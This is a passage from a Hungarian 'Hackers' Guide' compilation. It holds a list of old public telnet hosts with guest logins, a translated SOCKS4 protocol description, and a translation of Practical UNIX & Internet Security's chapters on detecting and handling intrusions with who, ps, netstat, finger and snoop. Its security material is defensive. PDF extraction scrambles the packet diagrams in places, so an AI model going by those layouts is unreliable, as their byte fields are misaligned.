QUIT - kilépés a telnetből<br />
SEND - különleges karaktereket közöl<br />
SET - beállitja a kölönleges paramétereket<br />
STATUS - kiadja az alapinformáciokat<br />
Z - félbeszakitja a telnetet<br />
? vagy HELP - kiirja a telnet súgót.<br />
TELNET HELYEK<br />
sunserv.sztaki.hu<br />
gopher.iif.hu (login:gopher,password:gopher)<br />
132
hollis.harvard.edu<br />
spacelink.msfc.nasa.gov<br />
metro.jussieu.fr10000<br />
info.cnri.reston.va.us185<br />
access.usask.ca (login:hytelnet)<br />
liberty.uc.wlu.edu70<br />
open.dra.com<br />
info.ccit.arizona.edu<br />
gopher.liberty.uc.win.edu70 (login:hytelnet)<br />
base.carl.org<br />
database.carl.org<br />
india.colorado.edu13<br />
spl.lib.wa.us (login:library) (select:1forVT100)<br />
stinfo.hq.eso.org<br />
sunsite.unc.edu<br />
quake.think.com (login:wais)<br />
info.cnri.reston.va.us185<br />
bruno.cs.colorado.edu<br />
ds.internic.net<br />
mudhoney.micro.umn.edu<br />
netfind.oc.com (login:netfind)<br />
redmont.cis.uab.edu (login:netfind)<br />
debra.dgbt.doc.ca3000<br />
teetot.acusd.edu<br />
cfa204.harvard.edu<br />
vax.mtak.hu<br />
Hackers’ Guide<br />
************************************************************************************************<br />
Socks4 Protokoll<br />
Fordítás, kiegészítéssel, eredeti címe, szerzoje: "SOCKS: A protocol for TCP proxy<br />
across firewalls" /Ying-Da Lee, Principal Member Technical Staff, NEC Systems<br />
Laboratory, CSTC/<br />
Néhány fogalmat tisztázzunk, mielott elolvassuk a protokoll-leírást: a kliens az a<br />
számítógép, amely csatlakozni akar az alkalmazásszerverhez. Pl. ha line-208-<br />
110.dial.matav.net csatlakozni akar irc.elte.hu -hoz, akkor line-208-<br />
110.dial.matav.net a kliens, és az irc.elte.hu az alkalmazásszerver. A SOCKS<br />
szerver pedig az a számítógép, amelyiken a SOCKS szolgáltatás fut, és közvetít a<br />
kliens és az alkalmazásszerver között.<br />
A SOCKS-ot eredetileg David Koblas fejlesztette ki és folyamatosan módosult és<br />
bovült a mai változatig - a 4.-esig. Ez egy protokoll, amely TCP kapcsolatokat<br />
133
Hackers’ Guide<br />
közvetít egy tuzfal-számítógépen, hogy a felhasználók számára átlátszó hozzáférést<br />
biztosítson más gépekhez. A protokoll független a különféle alkalmazások<br />
protokolljaitól, ezért sok különbözo szolgáltatásra használható (és használatos is),<br />
mint pl. telnet, ftp, finger, whois, gopher, www, stb. A hozzáférés biztosítása minden<br />
TCP kapcsolat elején történik; utána a szerver már egyszeruen csak közvetíti az<br />
adatokat a kliens és az alkalmazás-szerver között, minimális feldolgozással. A<br />
SOCKS-nak nem kell tudnia semmit az alkalmazás protokolljáról, ezért könnyen<br />
megvalósítható olyan alkalmazás, amely titkosítást használ az adatforgalom<br />
biztosítására.<br />
Két muvelet definiált: a CONNECT és a BIND.<br />
1) CONNECT<br />
A kliens, amikor csatlakozni akar az alkalmazás-szerverrel, csatlakozik a SOCKS<br />
szerverhez és CONNECT-kérést küld. A kliens a kérésben elküldi a célgép IP-címét<br />
és a portszámát, valamint a felhasználói azonosítóját, a következo formátumban.<br />
+----+----+----+----+----+----+----+----+----+----+....+----+ | VN | CD |<br />
DSTPORT | DSTIP | USERID |NULL| +----+----+----+----+----+--<br />
--+----+----+----+----+....+----+ bájtok száma 1 1 2 4 variable<br />
1<br />
ahol:<br />
VN a SOCKS protokoll verziószáma, és 4-nek kell lennie.<br />
CD a SOCKS parancskód és 1-nek kell lennie a CONNECT-kéréshez.<br />
NULL pedig egy 8 db 0-bitbol álló bájt.<br />
DSTPORT a célgép portja, amelyikre csatlakozni akarunk. 2 bájt, a és b, DSTPORT<br />
= a*256+b.<br />
DSTIP a célgép IP címe.<br />
USERID a felhasználói azonosító.<br />
A SOCKS szerver megnézi, hogy a kérés teljesítheto-e, mégpedig a forrásgép IP<br />
címébol, a célgép IP-címébol és portjából, a felhasználói azonosítóból és abból az<br />
információból, amelyet az IDENT útján nyer (RFC1413). Ha a kérés teljesítheto, a<br />
SOCKS szerver kapcsolatot létesít a megadott porttal a célgépen. Egy<br />
válaszcsomagot küld a kliensnek, amikor a kapcsolat létrejött, vagy ha kérést<br />
elutasította, vagy ha a kapcsolat nem hozható létre. Ez a válaszcsomag így néz ki:<br />
+----+----+----+----+----+----+----+----+ | VN | CD | DSTPORT |<br />
DSTIP | +----+----+----+----+----+----+----+----+ bájtok száma: 1 1<br />
2 4<br />
ahol:<br />
VN a válaszkód verziószáma és 0-nak kell lennie.<br />
CD az eredmény kódja, és valamelyiknek kell lennie a következok közül:<br />
134<br />
90: a kérés elfogadva (request granted)<br />
91: a kérés elutasítva vagy nem sikerült (request rejected or failed)<br />
92: a kérés elutasítva, mert a SOCKS szerver nem tudott a kliens identportjára<br />
csatlakozni<br />
93: a kérés elutasítva, mert a kliensprogram és az identd más<br />
felhasználói azonosítót mutatnak
A többi mezot figyelmen kívül kell hagyni.<br />
Hackers’ Guide<br />
A SOCKS szerver azonnal lezárja a kapcsolatot, ha a kapcsolatot nem sikerült<br />
létrehozni, vagy a kérés el lett utasítva. Ha a kérést elfogadta, a SOCKS szerver<br />
felkészül az adatok mindkét irányba történo forgalmazására. Ez lehetové teszi a<br />
kliensnek, hogy írjon/olvasson az adatcsatornán, mintha közvetlenül az<br />
alkalmazásszerverrel lenne összeköttetésben.<br />
2) BIND<br />
Amikor a kliens kapcsolatot akar fogadni az alkalmazásszerverrel, csatlakozik a<br />
SOCKS szerverhez és egy BIND kérést küld. Ez csak akkor történhet, ha elotte már<br />
az alkalmazásszerverrel létrejött egy kapcsolat a CONNECT-kéréssel (elsodleges<br />
kapcsolat). A BIND tulajdonképpen muveletek sorozata:<br />
-bind(): egy socket létrehozása<br />
-getsockname(): a socket IP címének és portszámának megállapítása<br />
-listen(): kész vagyunk az alkalmazásszerver által kezdeményezett kapcsolat<br />
fogadására<br />
-az elsodleges kapcsolaton informáljuk az alkalmazásszervert, hogy milyen IP-címen<br />
és portszámon kell kapcsolódnia<br />
-accept(): elfogadjuk az alkalmazásszerver által kezdeményezett kapcsolatot.<br />
A SOCKS BIND célja, hogy egy ilyen muveletsort végrehajtson, de a SOCKS<br />
szerveren hozzuk létre a socketet, és nem a kliensen.<br />
A kliens a kérésben az alkalmazásszerver IP-címét, az elsodleges kapcsolat<br />
portszámát és a felhasználói azonosítóját küldi el.<br />
+----+----+----+----+----+----+----+----+----+----+....+----+ | VN | CD |<br />
DSTPORT | DSTIP | USERID |NULL| +----+----+----+----+----+--<br />
--+----+----+----+----+....+----+ bájtok száma: 1 1 2 4 variable<br />
1<br />
ahol:<br />
VN a SOCKS protokoll verziószáma, és 4.<br />
CD jelzi, hogy BIND kérésrol van szó, és 2-nek kell lennie.<br />
A SOCKS szerver a klienstol érkezo információkat használja arra, hogy eldöntse,<br />
teljesítheto-e a kérés. Egy válaszcsomagot küld vissza a kliensnek, ugyanolyan<br />
formában, mint a CONNECT-kérésnél:<br />
+----+----+----+----+----+----+----+----+ | VN | CD | DSTPORT |<br />
DSTIP |<br />
2 4<br />
ahol:<br />
+----+----+----+----+----+----+----+----+ bájtok száma: 1 1<br />
VN a válaszkód verziószáma és 0-nak kell lennie.<br />
CD az eredmény kódja és valamelyiknek az alábbiak közül kell lennie:<br />
90: a kérés elfogadva (request granted)<br />
91: a kérés elutasítva vagy nem sikerült (request rejected or failed)<br />
92: a kérés elutasítva, mert a SOCKS szerver nem tudott a kliens identportjára<br />
csatlakozni<br />
135
Hackers’ Guide<br />
93: a kérés elutasítva, mert a kliensprogram és az identd más<br />
felhasználói azonosítót mutatnak<br />
Az elfogadott kérés esetében a DSTPORT és DSTIP mezoknek jelentésük van, nem<br />
úgy, mint a CONNECT esetében, ahol figyelmen kívül hagytuk. Itt a SOCKS szerver<br />
létrehoz egy socketet, hogy fogadni tudja a kapcsolatot az alkalmazásszervertol, és<br />
az IP-címet és portszámot visszaküldi a kliensnek (a DSTIP és DSTPORT<br />
mezokben). Ha a DSTIP mezo a válaszban 0 (az INADDR_ANY konstans értéke),<br />
akkor a kliensnek ki kell ezt cserélnie a SOCKS szerver IP-jével, amelyikhez a kliens<br />
csatlakozik. Általános esetben ez a két szám a kliens rendelkezésére áll a<br />
getsockname() hívás eredményeként. Az alkalmazásprotokollnak biztosítania kell<br />
egy módot arra, hogy ezt a két információt a kliens az alkalmazásszerverhez<br />
eljuttassa, ezáltal az létrehozhassa a kapcsolatot, és ahelyett hogy a klienshez<br />
csatlakozna, a SOCKS szerver megnyitott socket-jéhez csatlakozzon.<br />
A SOCKS szerver egy második válaszcsomagot küld a kliensnek, amikor a kapcsolat<br />
az alkalmazásszerverrel létrejött. A SOCKS szerver ellenorzi a kapcsolat<br />
kezdeményezojének IP-címét, hogy azonos-e a kliens által a BIND-kérésben<br />
megadott DSTIP mezovel. Ha nem egyeznek, a második válaszcsomag CD mezoje<br />
91 lesz és a SOCKS szerver mindkét kapcsolatot bontja (tehát a kliens másodlagos<br />
kapcsolatát és az alkalmazásszerver frissen létrehozott kapcsolatát). Ha<br />
megegyeznek, a második válaszcsomag CD mezoje 90 lesz és a SOCKS szerver<br />
felkészül az adatforgalmazás közvetítésére a két kapcsolat között. A kliens innentol<br />
kezdve ugyanúgy használhatja a socketet, mintha közvetlenül az<br />
alkalmazásszerverhez csatlakozna.<br />
A CONNECT és BIND muveleteknek egyaránt idokorlát van meghatározva (2 perc a<br />
jelenlegi CSTC implementációban) a SOCKS szerver és az alkalmazásszerver<br />
közötti kapcsolatok létrehozására. Ha a kapcsolat az idokorláton belül nem jön létre,<br />
a SOCKS szerver lezárja a kapcsolatot a kliens felé és feladja a dolgot.<br />
Idáig tartott a protokoll leírása, most pedig lássunk egy egyszerusített példát. Tegyük<br />
fel, hogy a kliens IP-címe 10.0.0.1, a SOCKS szerveré 10.0.0.2, és az<br />
alkalmazásszerveré 10.0.0.3. A kliens csatlakozni akar az alkalmazásszerver 6667es<br />
portjára, a SOCKS szerveren keresztül. A következoket kell tennie:<br />
Csatlakozik a 10.0.0.2 SOCKS szerver 1080-as portjára (általában ez a szabvány<br />
SOCKS port), és elküldi az alábbi válaszcsomagot:<br />
4 1 26 11 10 0 0 3 65 0<br />
A fent leírt CONNECT-kérésnél ellenorizzük, melyik szám mit jelent; a 65 az ASCII A<br />
karakter (felhasználói azonosító); a végén pedig ott a NULL.<br />
A szerver ekkor ellenorzi, hogy teljesítheto-e a kérés, esetünkben úgy dönt, hogy<br />
teljesítheto, és kapcsolatot létesít a 10.0.0.3 gép 6667-es portjával. Ha sikerült<br />
létrehozni a kapcsolatot, válaszcsomagot küld a kliensnek:<br />
0 90 4 10 10 0 0 3<br />
Ezután felkészül a közvetítésre. Ha úgy dönt, hogy a kapcsolatot nem teljesíti, vagy<br />
nem hozható létre a kapcsolat az alkalmazásszerverrel, akkor a válaszcsomag<br />
elküldése után egybol bontja a kapcsolatot a klienssel.<br />
136
Hackers’ Guide<br />
************************************************************************************************<br />
Betörések felfedezése és kezelése I.<br />
Eredeti mû : Practical UNIX & Internet Security<br />
Ez a rövidke kis írás azt próbálja leírni majd,hogy milyen lépéseket kell tennünk,ha<br />
betörést észleltünk a rendszerünkbe:hogyan fogjuk el a betolakodót;hogyan derítsük<br />
ki,hogy milyen károkat okozott;hogyan állítsuk helyre a keletkezõ károkat,ha<br />
szükséges.Reméljük,soha nem kell használnod az itt leírt technikákat.<br />
Bevezetés<br />
Három fõ szabály van arra,hogy hogyan kezeljük a betöréseket.<br />
Szabály#1 NE ESS PÁNIKBA!<br />
Egy betörés után,számos különbözõ válaszút elõtt állsz.Ne idegeskedj amiatt,ami<br />
történt,mert így gondolkodás nélkül olyan dolgokat tehetsz,amelyekkel csak rontassz<br />
a helyzeten.<br />
Mielõtt bármit is csinálnál,meg kell kérdezned magadtól néhány kérdést,és a<br />
válaszokat fejben tartani.<br />
- Valóban betörés történt? Az a valami,ami esetleg a betolakodó jelenlétére utal,lehet<br />
az eredménye egy software,vagy emberi hibának is.<br />
- Valóban történt bárminemû károkozás? Számos sikeres betörésnél a betolakodó<br />
ugyan megszerzi a jogosulatlan elérést,de nem nyúl személyes információkhoz,és<br />
nem változtatja meg file-ok tartalmát.<br />
- Fontos,hogy elérjük,és biztonságba helyezzük a bizonyítékot,amit felhasználunk a<br />
késõbbi nyomozás során?<br />
- Fontos,hogy a rendszert minél hamarabb visszaállítsuk normál állapotába?<br />
- Ki kell derítened,hogy lettek -e file-ok megváltoztatva,vagy törölve? Ha igen,hogyan<br />
fogod biztosan megtudni,hogy valóban így történt-e?<br />
- Számít,hogy a cég,vagy a rendszer tulaja tud errõl az incidensrõl? És ha egy külsõ<br />
személy hall róla?<br />
- Megtörténhet újból?<br />
137
Hackers’ Guide<br />
A kérdésekre adoot válaszok egymásnak ellentmondóak is lehetnek,pl : a bizonyíték<br />
védelme és a file-ok összehasonlítása a backuppal nem lehetséges,ha a cél a<br />
rendszer minél elõbbi üzembehelyezése.Neked kell majd eldöntened,mi a legjobb a<br />
site-odnak.<br />
Szabály#2 Dokumentálj!<br />
Indíts egy logot,azonnal.Fogj egy notebookot,és írj le mindent,amit találsz,és mindig<br />
jegyezd le a dátumot,és idõt is.Ha text file-okat vizsgálsz,nyomtass másolatokat,és<br />
dátumozd-szignózd.Ha megvan a szükséges disk space,oda is írd ki az egészet a<br />
script paranccsal.Ezeket az infokat kézben tartva a késõbbi tanulás jelentõs idõt,és<br />
bosszankodást takaríthatunk meg,különösen,ha ha gyorsan vissza kell állítanod,vagy<br />
meg kell változtatnod file-okat,hogy visszaállítsd a rendszert. A következõ<br />
szekciókban megpróbáljuk leírni a mechanizmust,amit arra tudsz használni,hogy<br />
észrevedd a betolakodót,és kezelni tudd a kérdést : mit csináljak,ha<br />
felfedeztem,hogy betolakodó van a rendszeremen.<br />
Szabály#3 Tervezz elõre!<br />
Amikor egy biztonsági probléma adódik,van néhány standard lépés,amiket meg kell<br />
tennünk.Ezeket a lépéseket tervezd el elõre,jegyezd le egy papírra,mert betörés<br />
esetén nagy a hezitálás és a zûrzavar.Ilyenkor nehéz tiszta fejjel gondolkodni. :)<br />
Nagyobb installációknál lehet,hogy szeretnéd gyakorolni ezeket a lépéseket.A<br />
következõ alaplépések ott lehetnek a tervedben :<br />
Step 1: Azonosítsd és értsd meg a problémát.<br />
Ha nem tudod,mi is a probléma pontosan,nem tudsz lépéseket tenni a<br />
kiküszöböléshez.Ez nem azt jelenti,hogy tökéletesen kell,hogy megértsd,de legalább<br />
a körvonalait lásd a problémának,amivel szembenézel.A hálózati kábel elvágása<br />
nem segít rajtad,ha egy bosszúszomjas alkalmazott az irodájából okozta a bajt.<br />
Step 2: Tárold vagy állítsd le a károkozást.<br />
Ha azonosítottad a fennálló problémát,tegyél azonnali lépéseket a megállítás vagy a<br />
korlátozás felé.Abban az esetbet,ha azonosítottad az alkalmazottat,aki system fileokat<br />
töröl,biztosan szeretnéd kilõni az acc.-ját,és talán fegyelmi eljárást indítani<br />
ellene.Ezek olyan lépések,amelyekkel korlátozni lehet a károkozást a<br />
rendszerben,illetve adataiban.<br />
Step 3: Bizonyítsd a diagnózist és határozd meg a kárt.<br />
Ha sikerült az okozott kárt letárolnod valamilyen formában,bizonyítsd a diagnózist,és<br />
határozd meg,milyen kár keletkezett.Tüntek el file-ok,miután az alkalmazottat kilõttük<br />
a rendszerbõl? Soha sem lehetsz 100%-ig biztos benne,hogy 2 vagy több incidens<br />
összefügg.Ezenkívül nem azonosíthatod az összes okozott kárt minden esetben.<br />
Step 4: Állítsd vissza a rendszeredet.<br />
Miután megtudtad,milyen méretû kár keletkezett,vissza kell állítanod a rendszert<br />
normál állapotba.Ez keverhetõ a rendszer egyes részeinek újraindításával a<br />
backupból,vagy jelenthet egy egyszerû system restartot.Mielõtt bármit is<br />
tennél,bizonyosodj meg róla,hogy azok a programok,amiket<br />
138
használsz,"biztonságosak". A támadó felcserélhette a restore programot egy<br />
trojannal,ami letörli az összes file-t a HD-n,és a backup szalagon.<br />
Step 5: Barátkozz meg a helyzettel.<br />
Hackers’ Guide<br />
Ha ilyen jellegû probléma adódik,talán szeretnél néhány változtatást és javítást<br />
eszközölni a rendszeren,miután az visszaállt normál állapotába.Ha egy olyan<br />
személy a bûnös,aki csak valamilyen hibát követett el,és így sebezte meg a<br />
rendszert,talán késõbb szeretnél oktatást adni neki,hogy másodszor elkerüld ezt a<br />
balesetet.Ha valaki szándékosan okozta a kárt,törvényes eljárást kell indítani ellene.<br />
Step 6: Hajtsd végre a szükséges módosításokat,hogy a rendszer biztonságban<br />
legyen.<br />
Ez nagyon fontos lépés,mivel ha nem hárítjuk el a sechole-t,a probléma a<br />
közeljövõben könnyen elõfordulhat mégegyszer.De vigyázzunk,minden módosítást<br />
nagy körültekintéssel végezzünk,nehogy nagyobb kárt okozzunk,mint amit maga a<br />
betörés okozott.<br />
Fordította : Th3NmY<br />
************************************************************************************************<br />
Betörések felfedezése és kezelése II.<br />
A betörõ felfedezése<br />
Számos módszer létezik arra,hogy hogyan fedezhetsz fel egy betolakodót :<br />
-A támadó rajtakapása munka közben.Pl : szeretnéd megnézni,hogy a superuser egy<br />
dial-up terminálról van-e belépve,miközben te vagy az egyetlen személy,aki tudja a<br />
superuser passwordot.<br />
-Következtetés,hogy egy támadó bent van abból,hogy változtatásokat eszközölt a<br />
rendszeren.Pl : kapsz egy e-mailt egy támadótól,aki értesít a sechole-ról,vagy új<br />
account-bejegyzéseket találsz a /etc/passwd-ben. (Unix)<br />
-Üzenetet kapsz egy system administrator-tól,aki egy másik site-ról furcsa<br />
tevékenységet jelez a saját site-járól,amelynek eredete egy olyan account,ami a te<br />
rendszereden van.<br />
-Furcsa aktivítás a rendszeren,úgymint rendszerösszeomlások,nagy hard disk<br />
tevékenység,megmagyarázhatatlan reboot-ok,jelentéktelen accounting<br />
ellentmondások,[1] vagy indokolatlanul lassú system response-ok(Egy Crack futhat a<br />
rendszeren).<br />
139
Hackers’ Guide<br />
[1] Nézd meg Cliff Stoll - The Cuckoo's Egg írását,amely egy olyan történet,amiben a<br />
szerzõ leírja, milyen ellentmondások vezették egy hacker aktivításának<br />
leleplezéséhez.<br />
Számos parancs létezik,amiket arra használhatsz,hogy felfedezz egy betörést,és<br />
néhány kitûnõ package(úgymint Tiger és a Tripwire) is hasonló célt<br />
szolgál.Alkalmazd ezeket gyakran,de ne szabályos idõközönként,hanem<br />
elszórtan.Ez csökkenti a támadók esélyeit a sikeres betöréshez.<br />
Aktivítás közben elfogni a betolakodót<br />
A legkönnyebb út ahhoz,hogy elfogjunk egy támadót,hogy olyan eseményeket<br />
keresünk,amelyek nem megszokottak a rendszeren. Pl:<br />
- Egy user több ízben is loginol.(Sok window system regisztrál egy külön login-t<br />
minden window-hoz,amelyet a user nyit meg,de álltalában szokatlan,hogy ugyanaz a<br />
user be van loginolva 2 különbözõ dial-in vonalról is ugyanabban az idõben)<br />
- Egy user,aki nem programozó,de ennek ellenére egy compilert vagy debuggert<br />
futtat<br />
- Egy user,aki nagyon keményen,és nem jellemzõen használja a networkot.<br />
- Egy user,aki sok dialout hívást indít.<br />
- Egy user,akinek nincs modemje,a computerbe dial-in line-ról van loginolva.<br />
- Egy személy,aki superuserként hajt végre parancsokat.<br />
- Hálózati kapcsolatok elõzõleg ismeretlen gépekrõl,vagy site-okról,amelyek soha<br />
nem kapcsolódtak a rendszeredhez.<br />
- Egy user,aki login-olva van,miközben vakációzik,vagy munkaidõn kívül van(pl : egy<br />
titkárnõ 1:00a.m. -kor dialin - ezett,stb...)<br />
A UNIX rendelkezésünkre bocsát egy rakás olyan parancsot,amelyek segíthetnek<br />
kitalálni,ki mit csinál a rendszeren.A finger, users, whodo, w és who parancsok egy<br />
listát adnak a userekrõl,akik jelenleg loginolva vannak.A ps parancs segít<br />
megállapítani,hogy melyik user mit csinál egy adott idõben.A netstat parancs arra<br />
használható,hogy leellenõrizzük a hálózati aktivítást.<br />
Ha te egy system administrator vagy,már biztosan nagy gyakorlatod van ezeknek a<br />
parancsoknak a kiadásában a felhasználói aktivítás ellenõrzésére. Egy idõ után már<br />
tudni fogod ,hogy az egyes userek milyen parancsokat szoktak kiadni,így ha valami<br />
furcsa dolog történik,közelebbrõl is megnézheted a dolgot.<br />
Légy óvatos,mert ezeket a parancsokat meg tudják "bolondítani" azok a<br />
betolakodók,akiknek sok tapasztalatuk van.Pl a w,users and finger a /etc/utmp file-t<br />
ellenõrzik,hogy ki van jelenleg bejelentkezve.Ha egy támadó töröl,vagy megváltoztat<br />
a saját bejegyzését,vagy az egész file-t megváltoztatja,ezek a parancsok nem fogják<br />
a támadó jelenlétét jelezni.Ráadásul néhány rendszer nem update-eli ezt a file-t,és<br />
néhány window system nem jól update-eli új bejegyzésekkel,szóval nem biztos,hogy<br />
ezek a parancsok minden esetben hiteles információt adnak vissza.<br />
140
Hackers’ Guide<br />
A ps parancs megvizsgálja a kernel process-tábláját,egyszóval ez sokkal ellenálóbb<br />
az esetleges nem kívánt beavatkozások ellen,mint a /etc/utmp file<br />
vizsgálata.Ugyanakkor egy betolakodó akinek már megvan a superuser elérése a<br />
rendszereden,módosíthatja a ps parancsot,vagy a code-ot a rendszer<br />
hívásokban,amiket használ,így az nem fogja kiírni az álltala futtatott<br />
processeket.Egyébként bármely process tudja módosítani az argv argumentumait,<br />
megengedve ezzel,hogy azt jelezze ki,amit akar a ps parancs kimenetében.Ha nem<br />
hiszed el,amit ezek a parancsok kiírnak,a jó úton haladsz. :)<br />
Mit kell tennem,ha valakit elkaptam?<br />
Van egy jó pár választási lehetõségünk,hogy mit teszünk a betolakodóval,akit<br />
lekapcsoltunk :<br />
1. Nem törõdünk vele.<br />
2. Megpróbálunk kapcsolatba lépni vele a write vagy a talk paranccsal,és<br />
megkérdezni,mit akar.<br />
3. Megpróbáljuk nyomkövetni(trace-elni) a connection-t,és azonosítani a támadót<br />
4. Megszakítjuk a connection-t azzal,hogy az álltaluk indított processeket lelõjük;<br />
kihúzzuk a modemet,vagy a hálózati csatlakozót,vagy kikapcsoljuk a computert.<br />
5. Kapcsolatba lépünk a FIRST(Forum of Incident Response and Security Teams)<br />
team-mal(e.g., the CERT-CC),és jelezzük nekik,hogy támadás ért.<br />
Az,hogy mit csinálsz,a te döntésed.Egy támadót figyelmen kívül hagyni a<br />
rendszereden nem egy jó megoldás,mert szabad utat kap,hogy molesztálja a<br />
systemedet,a userokat,stb... :)<br />
Ha a 2. pontot választod,tehát megpróbálsz kapcsolatba lépni vele,mindent logolj<br />
,amit a támadó küld vissza neked,majd döntsd el,melyik ponttal folytatod....<br />
Megjegyzés: Néhány intruder lehet gonosz gondolkodású,vagy pedig nagyon<br />
ilyedékeny,amikor rájön,hogy leleplezték.Ha kapcsolatba lépsz velük,lehet,hogy úgy<br />
reagálnak,hogy elkezdenek mindent letörölni a disken,hogy eltüntessenek minden<br />
nyomot.Ha egy ilyen behatolóval próbálsz kapcsolatba lépni,elõtte legyél biztos<br />
benne,hogy az egész rendszerrõl van backupod.<br />
Ha a behatoló be van lépve a pc-nkbe a hálózaton keresztül,talán szeretnéd<br />
mindenek elõtt a kapcsolatot nyomon követni(trace),mert sokkal könnyebb egy aktív<br />
kapcsolatot nyomkövetni,mint egy inaktívat. :)<br />
A nyomkövetés után talán szeretnél kommunikálni a támadóval a write vagy a talk<br />
parancsokat használva.Ha a behatoló a computeredhez egy fizikai terminálról van<br />
kapcsolódva,biztosan szeretnél a terminálhoz menni(fizikailag),és szembesülni<br />
illetõvel.<br />
Megjegyzés: Kerüld a mail vagy a talk parancs használatát,amivel a távoli site-tal<br />
lépünk kapcsolatba,(ha megpróbálod nyomkövetni a kapcsolatot,és megvan a<br />
remote host),mert lehet,hogy a remote site accountja is hackelve van.Próbáld a<br />
telefont használni ha lehetséges,mielõtt mailt küldessz.Ha mindenképpen egy<br />
üzenetet kell küldened,küldj valami ártatlan dolgot, pl : "Fel tudnál hívni? Problémáink<br />
vannak a mailer-eddel.". Természetesen,ha valaki hív téged,ellenõrizd,ki az.<br />
141
Hackers’ Guide<br />
A behatoló monitorozása<br />
Nyilván szeretnéd monitorozni a támadó aktivítását,hogy kitaláld,mit is csinál<br />
éppen.Kíderítheted,hogy éppen az account database-edet módosítja-e,vagy éppen a<br />
user-eid mailjei körül kotorászik...<br />
Sok dolgot érthetünk a behatoló monitorozása alatt.A legegyszerûbb ,hogy olyan<br />
programokat használunk,mint a ps vagy a lastcomm,hogy megnézzük,mely<br />
processeket használja az intruder.<br />
Az OS-ed típusától függ,hogy tudsz-e olyan programokat használni,mint a ttywatch<br />
vagy a snoop,amikkel az intruder billentyû-leütéseit figyelhetjük. Ezek a parancsok<br />
részletes információt adnak minden packetrõl,amelyet a hálózatra küldõdik. Ezekkel<br />
a részletes infokkal talán könnyebben kideríthetõ,mit is csinál a betolakodó.<br />
Pl:<br />
# snoop<br />
asy8.vineyard.net -> next SMTP C port=1974<br />
asy8.vineyard.net -> next SMTP C port=1974 MAIL FROM: asy8.vineyard.net SMTP R port=1974 250 next SMTP C port=1974<br />
asy8.vineyard.net -> next SMTP C port=1974 RCPT TO: asy8.vineyard.net SMTP R port=1974 250 next SMTP C port=1974<br />
asy8.vineyard.net -> next SMTP C port=1974 DATA\r\n<br />
next -> asy8.vineyard.net SMTP R port=1974 354 Enter mail, end<br />
Ebben a példában egy email-t fogtunk el,amelyet az asy8.vineyard.net-rõl küldtek a<br />
next nevû géphez.Ahogy a fenti példa mutatja,ezek a parancsok részletesen<br />
megmutatják,hogy milyen személyek mit csinálnak a rendszeren.<br />
Legyél óvatos ezekkel az eszközökkel,mert ezeket ellened is felhasználhatja a<br />
támadó,hogy monitorozza a te monitorozásodat.Egyébként megfontolandó ezeknek<br />
az eszközöknek a használata másik gépen(mármint nem a kompromittált<br />
géprõl),mivel így csökkenthetõ az esélye annak,hogy a behatoló felfedezi,hogy<br />
nyomozunk utána.<br />
Egy kapcsolat nyomkövetése<br />
A ps,w,és who parancsok az összes terminálról reportot kérnek,amelyekhez user van<br />
csatolva.Az olyan terminál nevek,mint /dev/tty01 rövidíthetõk simán tty01-re,vagy 01re.Fõként<br />
az olyan nevek,mint tty01,ttya vagy tty4a reprezentálnak soros fizikai<br />
vonalakat,miközben az olyan nevek,amelyek p,q vagy r betût tartalmaznak(mint pl :<br />
ttyp1),hálózati kapcsolatra utalnak(virtuális tty-ok,vagy más néven pszeudoterminálok,vagy<br />
pty-ok)<br />
Ha a támadó telefonvonalon keresztül csatlakozott a rendszerhez,nincs<br />
szerencséd.A telefonhívásokat csak a telefontársaság tudja nyomkövetni,és sajnos<br />
erre nem könnyû rávenni õket. Viszont sok telefontársaságnak vannak spéci<br />
sajátosságaik,úgymint CALL*TRACE és CALLER*ID(CNID),amelyeket<br />
használhatóak ugyanûgy modemhívásoknál,mint voice hívásoknál.Ha már<br />
beállítottad a service-t,és installáltad a megfelelõ hardware-t,már csak aktiválnod<br />
142
kell.<br />
Akkor elolvashatod az eredményeket...<br />
Hackers’ Guide<br />
Ha a támadó hálózaton keresztül van loginelve,használhatod a who commandot<br />
hogy gyorsan kiderítsd a computer nevét,amelyrõl a személy a kapcsolatot<br />
kezdeményezte.Egyszerûen írd be who :<br />
% who<br />
orpheus console Jul 16 16:01<br />
root tty01 Jul 15 20:32<br />
jason ttyp1 Jul 16 18:43 (robot.ocp.com)<br />
devon ttyp2 Jul 16 04:33 (next.cambridge.m)<br />
%<br />
Ebben a példában az orpheus user van loginelve a konzolról,a root tty01-en (Egy<br />
terminál,amely soros vonalon csatlakozik),jason és devon mindketten a hálózaton<br />
keresztül vannak beléptetve.<br />
A who parancs néhány verziója csak az elsõ 16 karakterét írja ki annak a<br />
hostnak,amelyrõl a kapcsolat származtatható(a gépnév egy 16 byte-os mezõben van<br />
a /etc/utmp-ben;a UNIX újabb verziói már több karaktert tudnak tárolni).Ahhoz,hogy a<br />
komplett hostname-et megtudd,a netstat parancsot kell használnod.Ha a behatoló<br />
törölte,vagy módosította a /etc/utmp filet,szintén ezt a parancsot kell használnunk a<br />
támadó eredetének kiderítésére.Sajnos a netstat parancs nem adja vissza,hogy<br />
melyik user melyik network connectionnal hozható kapcsolatba. (Természetesen ha<br />
az elsõ 16 karakterét kiderítettük a hostname-nek,könnyen kitalálhatod,melyik<br />
melyik,még akkor is,ha a /etc/utmp törölve lett.Arra is használhatód a netstat<br />
parancsot,hogy olyan kapcsolatokat keress,amelyek ismeretlen gépektõl<br />
származnak.) Szerencsére a UNIX modernebb verziói,beleértve az SVR4-et,már az<br />
egész hostnevet tárolják.<br />
Tegyük fel,hogy az elõbbi példában Jason egy intruder,mert tudjuk róla,hogy éppen<br />
jógagyakorlatokat végez Tibetben (Ahol nincsenek terminálok :).A who és netstat<br />
parancsokat használva kideríthetjük,hogy az a személy,aki Jason acc.-jával loginolt<br />
,a kapcsolatot a robot.ocp.com-ról indította.Most használjuk a finger parancsot,hogy<br />
kiderítsük,milyen userek vannak a távoli hoston loginelve:<br />
% finger @robot.ocp.com<br />
[robot.ocp.com]<br />
Login Name TTY Idle When<br />
olivia Dr. Olivia Layson co 12d Sun 11:59<br />
wonder Wonder Hacker p1 Sun 14:33<br />
%<br />
Természetesen ez a metódus nem feltétlenül leplezi le a támadót,mert lehet,hogy<br />
csak "átjáróként" (relay point) használja a gépet.A felsõ példában Wonder Hacker<br />
ttyp1-be van loginolva,amelyik egy másik virtuális terminál.Õ talán egy másik géprõl<br />
jött,és egyszerûen a robot.ocp.com-ot használja relay point-ként.<br />
143
Hackers’ Guide<br />
Ha van accountod a távoli gépen,lépj be,és nézd meg,ki futtat rlogin,vagy telnet<br />
